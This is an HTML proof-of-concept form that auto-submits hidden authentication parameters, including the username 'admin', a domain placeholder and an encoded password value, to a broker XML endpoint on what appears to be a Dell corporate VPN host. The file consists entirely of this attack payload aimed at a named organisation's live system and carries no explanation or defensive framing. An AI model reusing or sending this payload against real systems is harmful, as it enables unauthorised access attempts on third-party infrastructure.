<!DOCTYPE html>
<html>
<head>
	<title>PoC Form</title>
</head>
<body>
	<form action="https://cscvpn.apj.dell.com/broker/xml" method="POST">
		<input type="hidden" name="version" value="14.0">
		<input type="hidden" name="screen" value="do-submit-authentication">
		<input type="hidden" name="name" value="windows-password">
		<input type="hidden" name="params" value="">
		<input type="hidden" name="broker" value="">
		<input type="hidden" name="do-submit-authentication" value="">

		<input type="hidden" name="params" value="<param><name>username</name><values><value>admin</value></values></param><param><name>domain</name><values><value>*DefaultDomain*</value></values></param><param><name>password</name><values><value>{#-ASKS=1:1}cM+vxHbje5E8zLg/vRdcBasSpxRxnQHbs85FiPAY</value></values></param>">

		<input type="submit" value="Submit">
	</form>
</body>
</html>